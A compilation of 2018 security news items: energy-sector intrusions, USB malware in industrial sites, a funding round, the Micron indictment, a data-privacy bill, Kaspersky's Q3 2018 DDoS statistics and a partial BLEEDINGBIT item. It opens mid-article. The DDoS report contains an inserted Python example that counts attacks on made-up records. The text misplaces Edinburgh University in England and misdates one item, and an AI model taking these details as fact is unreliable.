Armis notified all affected vendors about the vulnerabilities this summer. Texas Instruments addressed CVE-2018-16986 with the release of BLE-STACK version 2.2.2. However, in the case of the OAD-related flaw, the chipmaker pointed out that the feature should not be used in production environments. Cisco and Aruba have also released patches for affected products.

Cyberattacks Against Energy Sector Are Higher Than Average: Report
2.11.2018 securityweek

Even if OT Systems Are Not Compromised, Cyberattacks Against IT Networks of Energy Suppliers Are Common

Attacks against critical infrastructure industries such as the energy supply -- actual and potential -- are rarely out of the news. Russia and Russian state actors are the probable aggressors. But we are still in the Cold War era of attacks against energy utilities: there has been no successful cyber-related attack against the supply of energy in the United States.

However, while attention is focused on the security of the power plant, threat hunting firm Vectra believes we are concentrating our security efforts in the wrong place.

"When I talk to the industry," Vectra's head of security analytics Chris Morales told SecurityWeek, "I am always asked, 'how can you watch my power pump?' My reply is simple: 'You've got a bigger problem than just your pumps. You have employees using Windows boxes. You use Windows servers. And your ICS systems are not as air-gapped as you like to think they are'."

We seem to be in the reconnaissance phase of a potential cyber war -- not yet an actual cyber war. Aggressors -- and all fingers tend to point primarily at Russia -- are breaking into energy utility firms and stealing plans. The purpose is to be stealthy. There is no current attempt to be disruptive.

"It really is very easy," said Morales, "for an attacker to get into an energy utility network, use the tools that are already there -- such as Outlook web access -- and then be able to hide within the signal of things that are already happening. The behaviors they use aren't really special, they're just using what's already there. In one instance, attackers used a Fortinet VPN client to do command and control -- which is not something usually monitored by security systems. When they get onto a network, they use things like PowerShell to remain invisible. I wouldn't say they use advanced tools, although I would say they are advanced attackers."

They do a good job at covering their tracks, he continued. "That's why they weren't spotted for so long, which includes erasing evidence such as logs. They uninstalled any Fortinet clients they used. Every time they did something, they cleaned it up -- which means there was nothing to report on from a log perspective. You need to focus on the network and network behaviors in real time in order to find this stuff, because this is the only thing that attackers cannot clean up."

Vectra's Cognito platform provides continuous real time visibility into network behavior, using AI to perform continuous threat detection. It provides full visibility into cyber-attacker behaviors from cloud and data center workloads to user and IoT devices, claims the firm.

Figures from a new Vectra Spotlight report (PDF), which drew anonymized metadata from more than 4 million devices, show that while destructive attacks against the energy supply have not occurred in the U.S., attacks against the IT networks of energy suppliers are common. Total command-and-control attacker behaviors (which includes elements such as external remote access, hidden HTTP CnC tunnels, and hidden HTTPS CnC tunnels) have been detected in more than 600 host devices per 10,000 host devices. Across all industries, the figure is around 450 per 10,000 hosts.

Internal reconnaissance behaviors (such as file share enumeration, internal darknet scans and port scans) have been detected in almost 10% of energy and utilities devices, compared to just over 7.5% of devices across all industries.

Lateral movement attacker behaviors (such as automated replication, a suspicious Kerberos client, and suspicious remote execution) were detected in just over 11% of energy and utilities devices, compared to around 7% for all industries.

Data exfiltration behaviors (such as a data smuggler, or a hidden DNS exfiltration tunnel) were detected in around 4.25% of devices, compared to around 3.75% across all industries. The report stresses that these behaviors alone do not necessarily indicate an attack unless they correlate with other behaviors in different phases of the attack lifecycle.

Nevertheless, the clear implication from these figures is that even if ICS/SCADA devices are not being directly and successfully targeted, the IT networks of the energy supply industry are a major target. "The key point," said Morales, "is that a lot of these energy utilities need to pay a lot more attention to the IT side of their systems. In general, they've done a pretty good job on the ICS side and the power grid -- they're not perfect, but they've actually put a lot of time and effort there. But I don't think they've put as much time and effort into their IT networks, which is where all the precursors of an attack come from -- such as stealing all the files pertaining to ICS or SCADA."

It seems like surveillance -- but if this is genuine surveillance, then the implied intention is to be able to bridge the gap between the IT and OT networks on demand in the future. "Will the files being stolen make this any easier? Absolutely they will," said Morales. "The kind of data that attackers have taken is wiring diagrams, panel layouts, and how the turbines work. They've been in the networks and they've acquired the data that shows how the entire SCADA system works. So, the next step would be to get into those systems. When you have the blueprints, you can start to figure out how to get in and what you need to do to disrupt or damage things, such as a thermostat and the operating ranges and how to change them -- which is basically what happened with the US/Israeli attack against Iranian centrifuges with Stuxnet."

Surprisingly perhaps, there is little evidence of China being involved in this type of cyberwar precursor -- most fingers tend to point towards Russia. China seems to be avoiding activity that can be related to cyberwar. It may also be honoring the Obama accord and limiting its activity to non-industrial espionage (e.g., military) -- and there is certainly a lot of evidence of Chinese activity in this area. "I feel that China is a lot more capitalist than people tend to think. They don't want to take us down -- they want us to buy their stuff," commented Morales.

The question remains, however, why is there so much cyber activity directed against the energy sector? "I absolutely believe there is weaponizing at the end of this," concluded Morales. "I can't predict it, I don't know what will happen with this; but it certainly feels like preparation in case something does happen. I personally believe that if there is ever a breakout again, between us and Russia, the first thing that opponents will want to do is take down the power systems."

Unless the energy companies improve their ability to keep stealthy adversaries out of their IT networks, the implication is that those adversaries are learning -- or, worse, have already learned -- how to do this.

USB Drives Deliver Dangerous Malware to Industrial Facilities: Honeywell
2.11.2018 securityweek

Malware Delivered via USB to Industrial Facilities Can Cause Major Disruption

Malware is still being delivered to industrial facilities via USB removable storage devices and some threats can cause significant disruptions, according to a report published on Thursday by Honeywell.

The industrial giant last year launched SMX, a product designed to protect facilities from USB-borne threats, and the company has also been using it to determine the risk posed by USB drives to such organizations.

Honeywell has analyzed data collected from 50 locations across the United States, South America, Europe and the Middle East. The enterprises whose systems were part of the study represented the energy, oil and gas, chemical manufacturing, pulp and paper, and other sectors.

Honeywell said its product had blocked at least one suspicious file in 44% of the analyzed locations. Of the neutralized threats, 26% could have caused major disruptions to industrial control systems (ICS), including loss of control or loss of view.

Furthermore, Honeywell says 16% of the detected malware samples were specifically designed to target ICS or IoT systems, and 15% of the samples belonged to high profile families such as Mirai (6%), Stuxnet (2%), Triton (2%), and WannaCry (1%).

“These findings are worrisome for several reasons. That high-potency threats were at all prevalent on USB drives bound for industrial control facility use is the first concern. As ICS security experts are well aware, it only takes one instance of malware bypassing security defenses to rapidly execute a successful, widespread attack,” Honeywell said in its report. “Second, the findings also confirm that such threats do exist in the wild, as the high-potency malware was detected among day-to-day routine traffic, not pure research labs or test environments. Finally, as historical trends have shown, newly emerging threat techniques such as TRITON, which target Safety Instrumented Systems, can provoke copycat attackers.”

It’s not uncommon for malware to make its way onto industrial networks and – as shown by previous studies – in a majority of cases these are non-targeted threats. Honeywell’s analysis confirms this, with only few incidents involving malware specifically targeted at industrial systems.

More than half of the threats found by Honeywell were Trojans (55%), followed by bots (11%), hacking tools (6%), and potentially unwanted applications (5%). One-third of samples had RAT functionality and 12% were capable of dropping other malware onto the compromised system. Seven percent of malicious files were hiding ransomware.

Malware delivered to ICS via USB

One noteworthy finding is that 9% of malware was designed to directly exploit flaws in the USB protocol or interface.

“Some went further, attacking the USB interface itself. 2% were associated with common Human Interface Device (HID) attacks, which trick the USB host controller into thinking there is a keyboard attached, allowing the malware to type commands and manipulate applications. This supports earlier Honeywell findings that confirmed HID attacks such as BadUSB as realistic threats to industrial operators,” Honeywell said.

Bot Fighter Shape Security Raises $26 Million
2.11.2018 securityweek

Shape Security, a provider of bot protection and anti-automation solutions, today announced that it has raised $26 million in growth capital, bringing the total raised by the Mountain View, California-based company to $132 million.

Founded by former Google, Department of Defense and major defense contractor employees, Shape’s platform helps protect against bots, fraud, and unwanted automation, and can detect and shut down automated attacks in real-time.

According to the company, its platform can “distinguish real users from fraudsters even when criminals use manual methods,” and currently processes more than 500 million transactions each day.

The additional funding will be used to support international growth, the company said.

Shape previously explained to SecurityWeek that its platform takes the advantage away from attackers by implementing real-time polymorphism, or dynamically changing code, to remove the static elements that malware, bots and other automated attacks use to interact with web applications.

“We’re making it the attacker’s problem to figure out how to be able to create a scripted programmatic attack against an application which is constantly rewriting itself,” Shuman Ghosemajumder, Shape Security’s CTO, told SecurityWeek in 2014.

"Today, we continue to use dynamic code to create a powerful defense for 20% of the consumer brands in the Fortune 500, and have evolved the original real-time polymorphism,” Sumit Agarwal, Shape Security co-founder & COO, now tells SecurityWeek.

According to Agarwal, the company has tweaked its platform in three key ways.

“We have evolved past visible changes made to application code in favor of mostly invisible changes made to our own code, which provides more stability," he said. "We have developed extremely powerful code-generation and obfuscation technologies which allow us to deliver unique code on every single pageview, for every single customer transaction we protect. This means that, even if an attacker were to reverse-engineer our code on one of our customer's websites, those learnings would be irrelevant almost immediately.”

Finally, Agarwal explained, the company has “created a self-protecting virtual machine that runs dynamically compiled JavaScript which has proven to be extremely effective at holding attackers at bay."

Norwest Venture Partners led the latest funding round, with new strategic investors JetBlue Technology Ventures and Singtel Innov8. Existing investors Kleiner Perkins, Venrock, Baseline Ventures, Allegis Capital, Focus Ventures, Epic Ventures, Raging Capital, and Tomorrow Ventures also participated.

U.S. Intel Budget Soars Under Trump
2.11.2018 securityweek

US spending on intelligence has soared under President Donald Trump, figures released on Tuesday showed, as the government stepped up cyber warfare activities and boosted spying on North Korea, China and Russia.

Spending on civilian and military intelligence jumped by 11.6 percent to $81.5 billion in fiscal 2018, which ended on September 30, according to the Department of Defense and the Office of the Director of National Intelligence.

Spending for the National Intelligence Program, which spans some 16 agencies including the Central Intelligence Agency, National Security Agency, some defense operations and reconnaissance from space, rose to $59.4 billion from $54.6 billion in fiscal 2017.

The Military Intelligence Budget came in at $22.1 billion, up from $18.4 billion in fiscal 2017.

The Trump administration has sharply increased both military and intelligence outlays, spending more on personnel, equipment and operations.

Under Trump, the CIA has resumed paramilitary actions like drone strikes in conflict zones, and also expanded investments into human intelligence.

There has also been a focused expansion of investment into offensive cyber capabilities, with the aim of blunting hacking attacks by China, Russia, North Korea and Iran.

But besides revealing the gross figure for expenditures, neither the Pentagon nor the Office of the Director of National Intelligence would provide any details on where the money goes, saying "such disclosures could harm national security."

US Accuses China, Taiwan Firms of Stealing Secrets From Chip Giant Micron
2.11.2018 securityweek

US Attorney General Jeff Sessions announced charges Thursday against Chinese and Taiwan companies for theft of an estimated $8.75 billion worth of trade secrets from US semiconductor giant Micron.

Sessions said the case was the latest in a series that are part of a state-backed program by Beijing to steal US industrial and commercial secrets.

"Taken together, these cases and many others like them paint a grim picture of a country bent on stealing its way up the ladder of economic development and doing so at American expense," Sessions said.

"This behavior is illegal. It is wrong. It is a threat to our national security. And it must stop."

The indictment released in the US district court in San Jose, California alleges that Chinese state-owned Fujian Jinhua Integrated Circuit Co. and privately owned United Microelectronics Corporation of Taiwan, along with three UMC executives, conspired to steal Micron trade secrets to help UMC and Fujian Jinhua develop DRAM chips used in many computer processors.

It said the three Taiwanese men -- Stephen Chen Zhengkun, He Jianting and Kenny Wang Yungming -- all previously worked at Micron and stole its technology when they joined UMC with the express purpose of transferring it to Fujian Jinhua, a two-year-old firm.

Chen was originally a top executive at Micron, then moved to lead UMC, and subsequently became president of Fujian Jinhua.

The move posed a major threat to Micron, a company valued at around $100 billion and which controls 20-25 percent of the global market for DRAM, or dynamic random-access memory, chips.

The indictment came four months after Fujian Jinhua won a patent dispute with Micron in a Chinese court, gaining an order for the US company to stop sales in China of more than a dozen solid-state drives, memory sticks and chips.

In retaliation, the US Commerce Department on Monday placed heavy restrictions on Fujian Jinhua's ability to buy US machinery and materials for its factories that would boost its DRAM production capabilities.

The new restrictions mean US firms will need special approval to export products intended for use by state-owned Fujian Jinhua Integrated Circuit Company, Ltd., according to a statement.

In addition to the criminal charges announced Thursday, the Justice Department filed a civil lawsuit to block imports of any UMC and Fujian Jinhua products using stolen Micron technology.

In the past two months the Justice Department has also indicted 12 Chinese, including three intelligence officials, in an alleged five-year plot to steal jet engine technology from major US and French companies who supply the world's airlines.

New Bill Proposes Prison for Execs Misusing Consumer Data
2.11.2018 securityweek

Democratic Senator Ron Wyden released a draft bill this week that proposes big fines for companies misusing the personal information of American consumers, along with significant prison terms for their executives.

The new bill, named the Consumer Data Protection Act of 2018, aims to give consumers control over their data, including how it’s sold or shared, and gives the U.S. Federal Trade Commission (FTC) the power to issue fines and other penalties.

Sen. Wyden is accepting feedback on the bill. In its current form, the legislation empowers the FTC to establish minimum privacy and security standards, issue fines of up to 4% of an offending company’s annual revenue (similar to the EU’s GDPR), and even prison terms ranging between 10 and 20 years for senior executives. The agency would be given the resources necessary to hire 175 individuals to “police” the market for private data.

The bill also proposes the implementation of a national “do not track” system that allows consumers to stop companies from tracking them on the web. On the other hand, firms would be allowed to charge individuals who want to use their products without having their personal information monetized.

Consumers would also be given the tools to review the information a company has on them and find out whom it has been shared with.

“Today’s economy is a giant vacuum for your personal information – Everything you read, everywhere you go, everything you buy and everyone you talk to is sucked up in a corporation’s database. But individual Americans know far too little about how their data is collected, how it’s used and how it’s shared,” Sen. Wyden stated.

“It’s time for some sunshine on this shadowy network of information sharing. My bill creates radical transparency for consumers, gives them new tools to control their information and backs it up with tough rules with real teeth to punish companies that abuse Americans’ most private information,” he added.

Sen. Wyden has been highly involved in matters related to cyber security. He proposed a bill to force vendors to ensure basic security in IoT devices, he asked the Department of Defense to secure its websites, and urged federal agencies to ditch Flash Player.

DDoS Attacks in Q3 2018
2.11.2018 Kaspersky

News Overview
The third quarter of 2018 turned out relatively quiet in terms of DDoS attacks. “Relatively” because there were not very many high-level multi-day DDoS onslaughts on major resources. However, the capacities employed by cybercriminals keep growing year after year, while the total number of attacks shows no signs of decline.

The early July attack on Blizzard Entertainment made some of this summer’s top headlines. Battle.net servers were sent offline, preventing players from logging in and launching their games for almost three days. Responsibility was claimed by a group called PoodleCorp, which made an appearance on Twitter promising to leave the company alone if their message were retweeted 2,000 times or more. Soon after their condition was satisfied, Blizzard reported “having fixed the technical issues earlier experienced by players.”

Towards the end of July there followed a series of attacks on another game publisher – Ubisoft. As a result, players were having trouble logging on to their accounts and using the multiplayer mode. According to the company spokesmen, user data was not compromised. There were no reports as to the purpose of the action. The attackers might have had financial gains in mind or just protested against some of the recent updates made to the games.

One more attack deserving the epithet of ‘major’ was, for several days, plaguing the three largest poker websites in the English-speaking segment: America’s Card… Room, PokerStars and Partypoker. The victimized operators were forced to cancel some of their events, sparking resentment on the part of players, who thus lost major sums of money.

As always, there were also DDoS attacks almost certainly resulting from political tension. The six-minute long disruption of the Swedish Social Democratic Party’s website at the end of August has been a stark example of such an attack. Likewise, politics is believed to have driven a similar attack on the website of a Democratic congressional candidate in California, which followed a month later. The tag of ‘political’ is also likely deserved by the activism-inspired (or rather environmental) motives which had fuelled the attack on the German RWE: by hitting their website the activists were trying to draw public attention to the impending clearing of the Hambach forest.

One way or another, the general public is still at a loss as to what had caused the affliction of the Ministry of Labor of the Republic of South Africa (the attack on its web resource took place in early September and, according to the Ministry spokesman, no internal systems or data were compromised). There is equal uncertainty as to the motives behind the attacks on the governmental service DigiD in Netherlands: at the end of July it was attacked thrice within one week, leaving many citizens unable to access its taxation-related and other features. Again, no data leaks were reported.

There are not many updates to the DDoS attackers’ toolset, although some curious new techniques and a couple of fresh vulnerabilities did come to the experts’ attention. Thus, on July 20, they detected a mass “recruiting campaign” targeting D-Link routers, which used over 3,000 IPs and just one command server. The exploit was not very successful in corporate environments; yet it remains to be seen whether it was able to create a new botnet of user routers (and how big at that).

Speaking of “ready” or almost ready Trojans, reports began to circulate at the end of July about the newly devised Trojan Death, which builds its botnet by recruiting surveillance cameras. The handiwork of the notorious hacker Elit1Lands, this malware uses the AVTech vulnerability, made public back in October 2016. Security researcher Ankit Anubhav has managed to contact the cybercriminal and learn that so far the botnet has not been used for mass DDoS attacks; yet the author has great expectations about it, especially as Death turned out equally suitable for spam mailouts and spying.

In addition, in late August and early September, the security specialists first saw the new versions of Mirai and Gafgyt botnets exploiting the vulnerabilities in SonicWall and Apache Struts (in the last case, the same bug associated with the massive data breach at the credit reference bureau Equifax).

Meanwhile, the three authors of the original version of Mirai, who had made it publicly available, finally got their court sentence. An Alaskan federal court ordered Paras Jha, Josiah White and Dalton Norman to pay considerable restitution and serve 2,500 hours of community service. By all appearances, they will work on behalf of the FBI, and the actual mildness of the sentence was due to the fact that during the process the three had duly collaborated with the federal investigators: according to court documents, the three men have already accumulated more than 1,000 hours of community service by lending their expertise to at least a dozen investigations.

In addition, the British police arrested one of the intruders behind the DDoS attack on ProtonMail, mentioned in our last report. The 19-year-old rookie hacker turned out to be a British citizen, also involved in making hoax bomb threats to schools, colleges and airlines. His parents insist that he was “groomed” by “serious people” online through playing the game Minecraft. This story will hardly end with the young prodigy’s employment, although he does face possible extradition to the US: according to the investigation, his exposure was mainly due to the fact that he did not practice very good operational security.

Quarter Trends
Compared to Q3 of last year, the number of DDoS attacks slightly increased thanks to September, while over the summer months and throughout the year as a whole there was a noticeable drop in the number of DDoS attacks.

Quarterly number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% is the number of attacks in 2017)

The graph above shows that the slight increase from last year is owed to September, which accounts for the lion’s share of all attacks (about 5 times more compared to 2017). July and August, quite the opposite, turned out quieter versus last year. In 2017, no such disproportion was observed.

DDoS attacks defeated by Kaspersky DDoS Protection in September in proportion to Q3 total in 2017 and 2018

A DDoS upsurge in September specifically is a fairly common thing: the primary target, year after year, is the education system, with attacks directed at the web resources of schools, universities and testing centers. The attack on one of England’s leading schools – Edinburgh University – which began on September 12 and lasted for nearly 24 hours, made the biggest headlines this year.

Attacks of this sort are often blamed on enemies of the state, but these allegations are unfounded, according to statistics. Thus, in the course of our private investigations we discovered that attacks mostly occur during term time and subside during vacations. The British non-profit organization Jisc got almost the same result: by collecting statistics about attacks on universities it learned that there were fewer attacks when students were on vacation. The same is true for the time of day: the main DDoS disturbances are experienced by schools during the period from 9:00 AM to 4:00 PM.

This, of course, may suggest that the perpetrators simply synchronize their actions with the daily pulse of the universities… But the simpler the explanation, the more likely it is: in all probability these attacks, too, are devised by the young ones, who may have quite a few “good” reasons to annoy their teachers, other students, or schools in general. Consistent with this assumption, our experts were able to find traces of DDoS attack preparations in the social networks; while our colleagues from Great Britain have come across a rather amusing case of their own: an attack targeting dorm servers was launched by a student in an attempt to defeat his online game adversary.

In all appearance, these cyclical outbursts will recur in the future – either until all educational institutions have secured themselves with impenetrable defenses, or until all students and their teachers have developed a whole new awareness of DDoS attacks and their consequences. It should be mentioned, however, that while most attacks are being organized by students, it does not mean that there aren’t any “serious” ones.

For example, the DDoS campaign launched in September against the American vendor Infinite Campus, which provides the parent portal service for many schools in its district, was so powerful and protracted as to come to the notice of US Homeland Security. It can hardly be explained by schoolchildren’s efforts alone.

Anyway, while the reasons behind the September upturn are most likely connected with the coming of the new school year, it is a bit tougher to explain the downturn. Our experts believe that most botnet owners have reconfigured their capacities towards a more profitable and relatively safer source of revenue: cryptocurrency mining.

DDoS attacks have become a lot cheaper of late, but only for the customers. As for the organizers, their costs still run high. At the very least, one has to purchase the processing power (sometimes even to equip a data center), write a Trojan of one’s own or modify an existing one (such as the ever popular Mirai), use the Trojan to assemble a botnet, find a customer, launch the attack, etc. Not to mention that these things are illegal. And law enforcement is watching every move: the takedown of Webstresser.org followed by a chain of arrests is a case in point.

On the other hand, cryptocurrency mining is almost legal these days: the only illegal aspect is the use of someone else’s hardware. With certain arrangements in place, mining is light enough on the donor system that its owner never notices, so there is not much chance of having to deal with cyberpolice. A cybercriminal can also repurpose the hardware they already own for mining, thus escaping the attention of law enforcement altogether. For example, there were recent reports of a new botnet of MikroTik routers, originally created as a cryptocurrency mining tool. There is also indirect evidence that owners of many botnets with deservedly unsavory reputations have now reconfigured them for mining. Thus, the DDoS activities of the successful botnet yoyo have dropped very low, although there was no information about it having been dismantled.

There is a maxim in logic which reads: correlation does not imply causation. In other words, if two variables change in a similar way, such changes do not necessarily have anything in common. Therefore, while it appears logical to link the growth in cryptocurrency mining with the slack in DDoS attacks this year, this cannot claim to be the ultimate truth. It is rather a working assumption.

Kaspersky Lab has a long history of combatting cyberthreats, including DDoS attacks of various types and complexities. The company’s experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes the commands the bots receive from their management and control servers. To initiate protection it is not necessary to wait until a user device gets infected or until the attackers’ commands get executed.

This report contains DDoS Intelligence statistics for Q3 2018.

For the purpose of this report, a separate (one) DDoS attack is that during which the intervals between the botnet’s busy periods do not exceed 24 hours. For example, if the same resource was attacked by the same botnet a second time after a pause of 24 hours or more, two attacks are recorded. Attacks are also considered to be separate if the same resource is queried by bots belonging to different botnets.

The geographic locations of victims of DDoS attacks and command servers are registered based on their IPs. The report counts the number of unique DDoS targets by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab to date. It should also be remembered that botnets are but one of the tools used for DDoS attacks, and this section does not cover every single DDoS attack over the given period.
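The attack-counting rule described above (a pause of 24 hours or more between a botnet's busy periods starts a new attack; different botnets against the same resource are separate attacks; unique targets are counted by unique IP) applied to constructed bot-activity records. This is an added illustration, not Kaspersky's code; the BotActivity record, the field names and the sample data are assumptions made for the example.

```python
# Added example (not Kaspersky's code): applies the report's attack-counting
# rule to constructed bot-activity records. The BotActivity/Attack records,
# their field names and the sample data below are assumptions for illustration.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# A pause of 24 hours or more between a botnet's busy periods starts a new attack.
SPLIT_GAP = timedelta(hours=24)


@dataclass(frozen=True)
class BotActivity:
    """One observed command window: `botnet_id` targeting `target_ip` at `seen_at`."""
    target_ip: str
    botnet_id: str
    seen_at: datetime


@dataclass(frozen=True)
class Attack:
    target_ip: str
    botnet_id: str
    start: datetime
    end: datetime

    @property
    def duration(self) -> timedelta:
        return self.end - self.start


def split_attacks(events):
    """Group activity by (target, botnet) and split each group wherever the pause
    between consecutive observations is 24 hours or more.

    Different botnets hitting the same target always count as separate attacks;
    the grouping key guarantees that."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev.target_ip, ev.botnet_id)].append(ev.seen_at)

    attacks = []
    for (target, botnet), times in by_key.items():
        times.sort()
        start = prev = times[0]
        for t in times[1:]:
            if t - prev >= SPLIT_GAP:          # ">= 24h" closes the current attack
                attacks.append(Attack(target, botnet, start, prev))
                start = t
            prev = t
        attacks.append(Attack(target, botnet, start, prev))
    return sorted(attacks, key=lambda a: (a.start, a.target_ip, a.botnet_id))


def unique_targets(attacks):
    """Unique targets are counted by unique victim IP address."""
    return len({a.target_ip for a in attacks})


def short_attack_count(attacks, max_hours=4):
    """Attacks whose busy window is shorter than `max_hours` (the report's 'under 4 hours' bucket)."""
    return sum(1 for a in attacks if a.duration < timedelta(hours=max_hours))


def summarize(events):
    attacks = split_attacks(events)
    longest = max((a.duration for a in attacks), default=timedelta(0))
    return {
        "attacks": len(attacks),
        "unique_targets": unique_targets(attacks),
        "short_attacks": short_attack_count(attacks),
        "longest_hours": longest.total_seconds() / 3600,
    }


# Constructed sample (documentation-reserved addresses, fictional botnet ids).
SAMPLE_EVENTS = [
    # botnet-A hits target 1 three times within 5 hours: one attack ...
    BotActivity("203.0.113.5", "botnet-A", datetime(2018, 7, 2, 10, 0)),
    BotActivity("203.0.113.5", "botnet-A", datetime(2018, 7, 2, 12, 0)),
    BotActivity("203.0.113.5", "botnet-A", datetime(2018, 7, 2, 15, 0)),
    # ... and returns 43 hours later: a second attack.
    BotActivity("203.0.113.5", "botnet-A", datetime(2018, 7, 4, 10, 0)),
    # A different botnet on the same target the same day: its own attack.
    BotActivity("203.0.113.5", "botnet-B", datetime(2018, 7, 2, 11, 0)),
    # Pause of 23h59m: still one attack, lasting just under 24 hours.
    BotActivity("198.51.100.9", "botnet-A", datetime(2018, 8, 7, 9, 0)),
    BotActivity("198.51.100.9", "botnet-A", datetime(2018, 8, 8, 8, 59)),
    # Pause of exactly 24 hours: the rule says "24 hours or more", so two attacks.
    BotActivity("198.51.100.9", "botnet-B", datetime(2018, 9, 1, 0, 0)),
    BotActivity("198.51.100.9", "botnet-B", datetime(2018, 9, 2, 0, 0)),
]

if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
```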

Quarter summary
As before, China tops the list for the highest number of attacks (78%), the US has reclaimed its second position (12.57%), Australia comes in third (2.27%) – higher than ever before. For the first time, South Korea has left the top 10 list, even though the entry threshold got much lower.
Similar trends are observed in distribution of unique targets: South Korea has dropped to the very bottom of the rating list; Australia has climbed to the third position.
In terms of number, DDoS attacks effected using botnets had their main peaks in August; the quietest day was observed in early July.
The number of sustained attacks has declined; however, short ones with duration of under 4 hours grew 17.5 p.p. (to 86.94%). The number of unique targets has increased by 63%.
The share of Linux botnets has grown only slightly from the last quarter. In this context, the by-type distribution of DDoS attacks has not changed much: SYN flood still comes first (83.2%).
The list of countries hosting the greatest number of command servers has changed a great deal over the last quarter. Countries like Greece and Canada, previously way out of the top 10, are now high up in the list.
Attacks geography
The top line is still occupied by China, its share having soared from 59.03% to 77.67%. The US reclaimed its second position, even though its share grew by a negligible 0.11 p.p. to 12.57%. This is where the surprises begin.

First off, South Korea has tumbled out of the top 10 for the first time since monitoring began: its share shrank from 3.21% last quarter to 0.30% for a downhill ride from fourth to eleventh position. Meanwhile Australia has climbed from sixth to third place: now it accounts for 2.27% of the total number of outgoing DDoS attacks. This suggests that the growth trend for the continent, which has emerged over the past few quarters, is still there. Hong Kong descended from second to fourth position: its share plummeted from 17.13% to 1.72%.

Other than South Korea, Malaysia, too, has left the top ten; these two were replaced by Singapore (0.44%) and Russia (0.37%) – seventh and tenth places respectively. Their shares have grown but little from Q2, yet because of China’s leap the admittance threshold became somewhat less demanding. The example of France demonstrates this very well: in Q2 France was tenth with 0.43% of the total number of DDoS attacks; this quarter its share reduced to 0.39% but the country still has made it to the eighth place.

Likewise, the combined percentage of all the countries from outside the top 10 has dropped from 3.56% to 2.83%.

DDoS attacks by country, Q2 and Q3 2018

Similar processes are taking place in the unique targets rating of countries: China’s share grew 18 p.p. to 70.58%. The first five positions for the number of targets look basically the same as those for the number of attacks, but the top 10 list is a bit different: South Korea is still there, although its share shrank a great deal (down to 0.39% from 4.76%). In addition, the rating list lost Malaysia and Vietnam, replaced by Russia (0.46%, eighth place) and Germany (0.38%, tenth place).

Unique DDoS targets by country, Q2 and Q3 2018

Dynamics of the number of DDoS attacks
The beginning and end of Q3 were not abundant in attacks, yet August and early September feature a jagged graph with plenty of peaks and valleys. The biggest spikes occurred on August 7 and 20, which indirectly correlates with the dates when universities collect applicants’ papers and announce admission scores. July 2 turned out the quietest. The end of the quarter, although not very busy, was still marked with more attacks than its beginning.

Dynamics of the number of DDoS attacks in Q3 2018

The day of week distribution was fairly even this quarter. Saturday now is the most “dangerous” day of the week (15.58%), having snatched the palm from Tuesday (13.70%). Tuesday ended up second to last in terms of the number of attacks, just ahead of Wednesday, currently the quietest day of the week (12.23%).

DDoS attacks by day of week, Q2 and Q3 2018

Duration and types of DDoS attacks
The longest attack in Q3 lasted 239 hours – just short of 10 days. Just to remind you, the previous quarter’s longest one was on for almost 11 days (258 hours).

The share of mass, protracted attacks considerably declined. This is true not only for the “champions”, which lasted upward of 140 hours, but also for all the other categories down to 5 hours. The most dramatic decline occurred in the 5 to 9 hours duration category: these attacks were down to 5.49% from 14.01%.

Yet short attacks of under 4 hours grew almost 17.5 p.p. to 86.94%. At the same time, the number of targets grew 63% from the last quarter.

DDoS attacks by duration, hours, Q2 and Q3 2018

The distribution by type of attack was almost the same as the previous quarter. SYN flood has kept its first position; its share grew even more to 83.2% (from 80.2% in the second quarter and 57.3% in Q1). UDP traffic came in second; it also edged upward to settle at 11.9% (last quarter the figure was 10.6%). Other types of attacks lost a few percentage points but suffered no change in terms of relative incidence: HTTP is still third, while TCP and ICMP – fourth and fifth respectively.

DDoS attacks by type, Q2 and Q3 2018

Windows and Linux botnets have split in about the same proportion as the last quarter: Windows botnets have gone up (and Linux ones down) by 1.4 p.p. This correlates pretty well with the attack type variation dynamics.

Windows vs. Linux botnets, Q3 2018

Botnet distribution geography
There was some shakeup in the top ten list of regions with the largest number of botnet command servers. The US remained first, although its share declined from 44.75% last quarter to 37.31%. Russia climbed to the second place, having tripled its share from 2.76% to 8.96%. Greece came in third: it accounts for 8.21% of command servers – up from 0.55% and from its position way outside the top ten the previous quarter.

China, with 5.22%, is only fifth, outplayed by Canada which scored 6.72% (several times more than its own figure in Q2).

At the same time, there was a major increase in the combined share of the countries outside the top ten: up almost 5 p.p., it now stands at 16.42%.

Botnet command servers by country, Q3 2018

No major high-profile attacks were reported over the last three months. In contrast with the summer slowdown, September’s upsurge of attacks on schools was particularly noticeable. It has become a part of the cyclic trend Kaspersky Lab has observed for many years.

Another conspicuous development is the shrinking number of protracted attacks paired with growing number of unique targets: botnet owners may be replacing large-scale offensives with small attacks (sometimes referred to in English-speaking media as “crawling” ones), often indistinguishable from the “network noise”. We have seen preludes to such change of paradigm over the previous quarters.

The top ten lineup in terms of the number of botnet C&C servers is being abruptly reshuffled for the second quarter in a row. It may be that the attackers are trying to expand into new territories or attempting to arrange geographic redundancy for their resources. The reasons for that may be both economic (electricity prices, business robustness when exposed to unforeseen circumstances) and legal – anti-cybercrime action.

The statistics for the last two quarters have led us to believe that certain transformation processes are currently unfolding in the DDoS community, which may seriously reconfigure this field of cybercriminal activity in the near future.

BLEEDINGBIT Bluetooth flaws in TI chips expose enterprises to remote attacks
2.11.2019 securityaffairs

Two vulnerabilities in Bluetooth Low Energy chips, dubbed BLEEDINGBIT, expose millions of access points and other networking devices to remote attacks.
Security experts from the IoT security firm Armis, the same that found the BlueBorne Bluetooth flaws, have discovered two serious vulnerabilities in BLE chips designed by Texas Instruments. The flaws, dubbed BLEEDINGBIT by Armis, could be exploited by a remote and unauthenticated attacker to take complete control of vulnerable devices and gain access to the enterprise networks housing them.

The issues affect Bluetooth Low Energy (Bluetooth 4.0) chips that are designed for applications that do not require exchanging large amounts of data, such as smart objects in healthcare and sports.

BLE is used in low-power devices; it covers the same range as classic Bluetooth (330 feet), but at a lower data transfer rate.

The affected chips are also used in access points and other networking devices manufactured by Cisco and Aruba Networks.

